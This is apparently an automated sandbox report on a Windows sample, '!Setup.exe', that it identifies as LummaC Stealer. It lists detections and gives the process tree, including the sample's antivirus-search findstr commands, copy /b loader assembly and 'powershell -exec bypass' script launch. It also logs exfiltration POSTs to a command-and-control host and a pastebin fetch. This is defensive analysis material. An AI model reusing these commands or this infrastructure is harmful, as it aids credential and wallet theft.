Edit tour

Windows Analysis Report
!Setup.exe

Overview

General Information

Sample name:	!Setup.exe
Analysis ID:	1581738
MD5:	cb8f02134e7a9e082e0d9bf4c988b202
SHA1:	c4a32f3385e1b91d135d2f713779299bdb6d0ab0
SHA256:	2b5fdba3647700d3dde718e3b43fde8c12f3425d0ab768d446450deeb1a3de33
Tags:	exeuser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Connects to a pastebin service (likely for C&C)

Drops PE files with a suspicious file extension

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

!Setup.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\!Setup.exe" MD5: CB8F02134E7A9E082E0D9BF4C988B202)

cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7616 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7624 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7676 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7712 cmdline: cmd /c md 71992 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7728 cmdline: extrac32 /Y /E Ec MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7752 cmdline: findstr /V "Ratio" Returning MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7768 cmdline: cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7784 cmdline: cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Banned.com (PID: 7800 cmdline: Banned.com V MD5: 62D09F076E6E0240548C2F837536A46A)

powershell.exe (PID: 1852 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7820 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 7800, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1", ProcessId: 1852, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7528, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7676, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T21:35:52.982519+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.37.209	443	TCP
2024-12-28T21:35:55.105526+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.37.209	443	TCP
2024-12-28T21:35:57.741369+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.37.209	443	TCP
2024-12-28T21:36:00.002405+0100	2028371	3	Unknown Traffic	192.168.2.4	49747	104.21.37.209	443	TCP
2024-12-28T21:36:02.211154+0100	2028371	3	Unknown Traffic	192.168.2.4	49753	104.21.37.209	443	TCP
2024-12-28T21:36:04.685957+0100	2028371	3	Unknown Traffic	192.168.2.4	49759	104.21.37.209	443	TCP
2024-12-28T21:36:07.125925+0100	2028371	3	Unknown Traffic	192.168.2.4	49765	104.21.37.209	443	TCP
2024-12-28T21:36:10.815856+0100	2028371	3	Unknown Traffic	192.168.2.4	49774	104.21.37.209	443	TCP
2024-12-28T21:36:13.030490+0100	2028371	3	Unknown Traffic	192.168.2.4	49779	104.26.3.16	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T21:35:53.839595+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.37.209	443	TCP
2024-12-28T21:35:55.897918+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.37.209	443	TCP
2024-12-28T21:36:11.594130+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49774	104.21.37.209	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T21:35:53.839595+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49737	104.21.37.209	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T21:35:55.897918+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49738	104.21.37.209	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T21:36:05.504971+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.37.209	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: !Setup.exe	ReversingLabs: Detection: 27%
Source: !Setup.exe	Virustotal: Detection: 16%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.2% probability

Source: !Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49779 version: TLS 1.2

Source: !Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49774 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49759 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.37.209:443

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Source: Joe Sandbox View	IP Address: 104.21.37.209 104.21.37.209
Source: Joe Sandbox View	IP Address: 104.26.3.16 104.26.3.16

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 104.21.37.209:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49779 -> 104.26.3.16:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49774 -> 104.21.37.209:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AQ4D61LZJFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18117Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WUB58VWQQVKXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8750Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B9W5VFRBJ5VK1I4ECJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20445Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A34H4KFN0QJ82PVOT8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z0LWSW34GXQ8HPHCEWPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 554711Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: fallyjustif.click
Source: global traffic	HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: global traffic	DNS traffic detected: DNS query: xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi
Source: global traffic	DNS traffic detected: DNS query: fallyjustif.click
Source: global traffic	DNS traffic detected: DNS query: rentry.co

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fallyjustif.click

Source: !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: !Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Banned.com.1.dr, Writing.8.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Banned.com.1.dr, Ford.8.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Banned.com.1.dr, Writing.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Banned.com.1.dr, Ford.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Banned.com.1.dr, Writing.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: !Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: !Setup.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: !Setup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: !Setup.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Banned.com.1.dr, Writing.8.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Banned.com.1.dr, Ford.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Banned.com.1.dr, Ford.8.dr, Writing.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Banned.com.1.dr, Writing.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Banned.com.1.dr, Ford.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Banned.com.1.dr, Writing.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Banned.com, 0000000C.00000000.1737418139.0000000000275000.00000002.00000001.01000000.00000007.sdmp, Banned.com.1.dr, Ford.8.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: !Setup.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: !Setup.exe	String found in binary or memory: http://www.teamviewer.com
Source: powershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBkq
Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.dr	String found in binary or memory: https://rentry.co/
Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/hZ
Source: 9OMAF2HFFRD0LNMKR.ps1.12.dr	String found in binary or memory: https://rentry.co/static/icons/512.png
Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/static/icons/512.pnghZ
Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.dr	String found in binary or memory: https://rentry.co/what
Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/whathZ
Source: Banned.com.1.dr, Writing.8.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Writing.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.209:443 -> 192.168.2.4:49774 version: TLS 1.2
